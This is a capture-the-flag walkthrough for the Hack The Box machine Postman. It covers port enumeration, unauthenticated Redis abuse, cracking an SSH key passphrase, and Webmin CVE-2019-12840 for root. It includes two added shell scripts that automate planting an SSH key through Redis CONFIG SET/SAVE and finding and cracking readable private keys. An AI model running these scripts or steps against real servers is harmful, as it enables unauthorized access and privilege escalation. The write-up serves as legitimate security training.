Things I have learned
- How to check whether a Redis instance is exposed without authentication, using redis-cli.
- Detailed enumeration with nmap: my first scan did not find the Redis port, because nmap's default scan covers only the 1000 most common ports and 6379 is not among them, so a full -p- scan was needed.
- How to enumerate and abuse Redis with redis-cli.
NMAP enumeration
nmap -sC -sV -p- -oN postman 10.10.10.160 -vvv
-p- is shorthand for -p 1-65535, so this option scans all 65535 TCP ports; the default scan only covers the top 1000 and would have missed Redis on 6379.
The enumeration results show three ports of interest: tcp/80 (HTTP), tcp/6379 (Redis) and tcp/10000 (Webmin).
Web page
http://10.10.10.160 serves a static page with nothing interesting on it. Whenever there is a web server it is still worth fuzzing for hidden directories with dirb, dirbuster or gobuster:
gobuster dir -u http://10.10.10.160 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_result
Browsing the Webmin login page
TCP/10000 is Webmin. A plain-HTTP request to http://10.10.10.160:10000 does not produce a login page: Webmin runs in SSL mode and only answers with a message pointing at https://postman:10000/, a hostname that does not resolve. At first I added a host entry in my /etc/hosts, but this is not necessary; simply browsing https://10.10.10.160:10000 presents the login page.
I tried some easy SQL injection tests in the username field, '# and ' or 1=1#, to see whether Webmin would throw up a SQL error.
The login page did not react to these tests. That is expected: Webmin authenticates against its own user file or the system's Unix accounts, not a SQL database, so there is no query to inject into.
Searching the web, I found that Webmin 1.910 has a "Package Updates" remote command execution exploit (CVE-2019-12840). It is an authenticated exploit: it needs the username and password of a Webmin user who is allowed to use the Package Updates module. I have no credentials yet, so I will come back to this later.
Exploiting Redis 4.0.9 to gain an SSH connection
This is a good read on how to exploit Redis with redis-cli.
My Kali Linux did not have redis-cli, so I installed it with apt install redis-tools.
The first step is to check whether I can execute commands such as config get dir or config get * without authenticating. To open an interactive session with Postman use redis-cli -h 10.10.10.160, or run a single command directly: redis-cli -h 10.10.10.160 config get dir. CONFIG GET dir returns Redis' working directory, the directory into which it writes its RDB dump file; on Postman this is /var/lib/redis, the home directory of the redis user the server runs as. If the reply is NOAUTH Authentication required, requirepass is set and this route is closed; if CONFIG comes back as an unknown command, the administrator has renamed it.
Since I can execute CONFIG without authentication, I can change the working directory (CONFIG SET dir) and the dump file name (CONFIG SET dbfilename), and SAVE will then write the dump wherever I pointed it. Pointing it at the redis user's ~/.ssh/authorized_keys turns this into an SSH login:
I generate my own RSA key pair and submit the public key to Postman through redis-cli, without authentication, in these steps:
ssh-keygen -t rsa -f /root/htb/postman/id_rsa
where /root/htb/postman/id_rsa is the path where the key pair (id_rsa and id_rsa.pub) is saved.
Insert two newlines before and after the contents of id_rsa.pub, like this: (echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") | tee payload.txt
The padding matters: the RDB file that SAVE writes puts a binary header in front of the value and a checksum after it, and the blank lines keep that junk on lines of its own, so sshd, which skips lines it cannot parse, still finds the key on a clean line. payload.txt is then piped into redis-cli and stored as a key on Postman:
cat payload.txt | redis-cli -h 10.10.10.160 -x set redis_rsa
Before connecting, restrict the permissions of the private key (not the public one) with chmod 600 id_rsa, otherwise ssh refuses to use it. Then connect as the redis user with the private key: ssh -i id_rsa redis@10.10.10.160
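The whole sequence above, as an added example that is not part of the original write-up: a small POSIX shell script that builds the padded payload, checks that the target answers CONFIG without AUTH, and then performs the CONFIG SET dir / CONFIG SET dbfilename / SET / SAVE steps through redis-cli. The target directory /var/lib/redis/.ssh is an assumption taken from what CONFIG GET dir returns on Postman, the key name redis_rsa is the one used above, and the REDIS_CLI variable is an addition so the script can be pointed at a wrapper for a dry run.

```sh
#!/bin/sh
# Added example, not from the original write-up: plant an SSH public key on a host
# running an unauthenticated Redis by pointing its RDB dump at ~redis/.ssh/authorized_keys.
# Assumptions: the Redis working directory on the target is /var/lib/redis (what
# CONFIG GET dir returned on Postman) and the redis user is allowed to log in.
set -eu

REDIS_CLI="${REDIS_CLI:-redis-cli}"   # path to redis-cli; a wrapper can be substituted

# Surround the public key with blank lines. The RDB file starts with a binary
# header and ends with a checksum; the padding keeps that junk on its own lines so
# sshd, which ignores lines it cannot parse, still finds the key on a clean line.
build_payload() {  # $1 = id_rsa.pub, $2 = output file
    { printf '\n\n'; cat "$1"; printf '\n\n'; } > "$2"
}

# Offline sanity check of the padding: first and last line must be empty and the
# file must contain exactly one key line. Prints the key-line count.
check_payload() {  # $1 = payload file
    [ -z "$(head -n 1 "$1")" ] || return 1
    [ -z "$(tail -n 1 "$1")" ] || return 1
    grep -c '^ssh-' "$1"
}

# Preflight: a NOAUTH reply means requirepass is set; a server that has renamed
# CONFIG answers with an unknown-command error. Either way this route is closed.
redis_is_open() {  # $1 = host; prints the CONFIG GET dir reply on success
    reply=$("$REDIS_CLI" -h "$1" config get dir)
    case "$reply" in
        *NOAUTH*|*"unknown command"*) return 1 ;;
    esac
    printf '%s\n' "$reply"
}

# Write the padded key into authorized_keys via CONFIG SET dir/dbfilename + SAVE.
plant_key() {  # $1 = host, $2 = payload file
    host="$1"; payload="$2"
    "$REDIS_CLI" -h "$host" config set dir /var/lib/redis/.ssh    # assumed path
    "$REDIS_CLI" -h "$host" config set dbfilename authorized_keys
    "$REDIS_CLI" -h "$host" -x set redis_rsa < "$payload"
    "$REDIS_CLI" -h "$host" save
}

# Usage from the attacking machine:
#   ssh-keygen -t rsa -f ./id_rsa -N ''
#   build_payload ./id_rsa.pub ./payload.txt
#   redis_is_open 10.10.10.160 && plant_key 10.10.10.160 ./payload.txt
#   chmod 600 ./id_rsa && ssh -i ./id_rsa redis@10.10.10.160
# SAVE overwrites the target file: any key already in authorized_keys is lost.
```

The dry-run hook is the point of REDIS_CLI: setting it to a script that just echoes its arguments shows the exact command sequence before anything touches the target, which is also how to spot that SAVE will clobber an existing authorized_keys.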
After gaining the SSH connection I changed directory to /home and listed it: there is one user directory, Matt. The user.txt file inside is owned by Matt with group Matt, and only the owner and members of that group can read it.
As expected, redis is not in the Matt group.
Escalate to Matt user
Find the files that belong to Matt with find: find / -type f -user Matt 2>/dev/null
This lists every regular file owned by Matt anywhere on the filesystem; 2>/dev/null discards the "Permission denied" errors from directories that redis cannot enter.
There is a key in /opt/id_rsa.bak, and checking its permissions reveals that it is world-readable.
So I copied the contents of the key over to my own Kali machine. In HTB, whenever you find an RSA private key, grab its contents, convert it to a hash with ssh2john, and crack the passphrase with john.
I usually use rockyou.txt as the wordlist for brute-forcing the passphrase: john --wordlist=/usr/share/wordlists/rockyou.txt hash
The recovered passphrase cannot be used to log in directly through SSH as Matt, because the sshd configuration on the box denies SSH logins for Matt (look for a DenyUsers or AllowUsers directive in /etc/ssh/sshd_config). But switching user from the redis shell with su - Matt and the same password works: the key passphrase has been reused as Matt's account password.
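The file hunt and the passphrase crack, as an added example that is not taken from the original write-up: shell functions that narrow the find output down to world-readable files that are actually private keys, plus a helper that runs ssh2john and john on one of them. The constructed directory layout, the ssh2john/john invocations and the path /opt/id_rsa.bak are assumptions about the tooling on Kali and about what the hit looks like on Postman.

```sh
#!/bin/sh
# Added example, not from the original write-up: after landing as redis, list the
# files owned by a target user that the current account can read, pick out the ones
# that look like private keys, and feed one to ssh2john/john. The search root and
# the user name are arguments; /opt/id_rsa.bak is the hit on Postman (assumed).
set -eu

# Regular files owned by $2 under $1 whose mode includes o+r (-perm -004).
# Errors from unreadable directories are discarded, as in the write-up's find.
readable_files_of() {  # $1 = root dir, $2 = user
    find "$1" -type f -user "$2" -perm -004 2>/dev/null
}

# Keep only files whose first line is a PEM private-key header.
private_keys_in() {  # reads file names on stdin, prints the key files
    while IFS= read -r f; do
        if head -n 1 "$f" 2>/dev/null | grep -q 'BEGIN .*PRIVATE KEY-----'; then
            printf '%s\n' "$f"
        fi
    done
}

# Convert a key to john's format and crack the passphrase with a wordlist.
# Prints the passphrase, or nothing if john did not find it. Assumes john's
# ssh2john wrapper is on PATH (Kali ships it alongside john).
crack_key() {  # $1 = key file, $2 = wordlist
    ssh2john "$1" > "$1.hash"
    john --wordlist="$2" "$1.hash" >/dev/null 2>&1 || true
    john --show "$1.hash" | awk -F: 'NR==1 && NF>1 {print $2}'
}

# Usage on the target, then on the attacking box:
#   readable_files_of / Matt | private_keys_in          # expected: /opt/id_rsa.bak
#   crack_key ./id_rsa.bak /usr/share/wordlists/rockyou.txt
# ssh -i id_rsa.bak Matt@10.10.10.160 is refused by the sshd configuration on the
# box; use the recovered passphrase with "su - Matt" from the redis shell instead.
```

Filtering on -perm -004 before looking at contents is what turns the raw find listing into an answer to the question that matters here: which of Matt's files can the redis account actually open.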
Privilege escalate to root
With Matt's credentials I tried logging on to Webmin, and it works. Matt has the right to use the Package Updates module, which is exactly what the exploit found earlier needs.
The exploit for the Webmin 1.910 Package Updates remote command execution is available in my local exploitdb copy (searchsploit), and searching in Metasploit shows it is also available as a ready-made module (exploit/linux/http/webmin_packageup_rce). Remember that this Webmin runs in SSL mode when setting the module's options.
I modified a few parameters in the exploit as below:
Then I ran the exploit and escalated to root: Webmin itself runs as root, so the command injected through Package Updates executes with its privileges.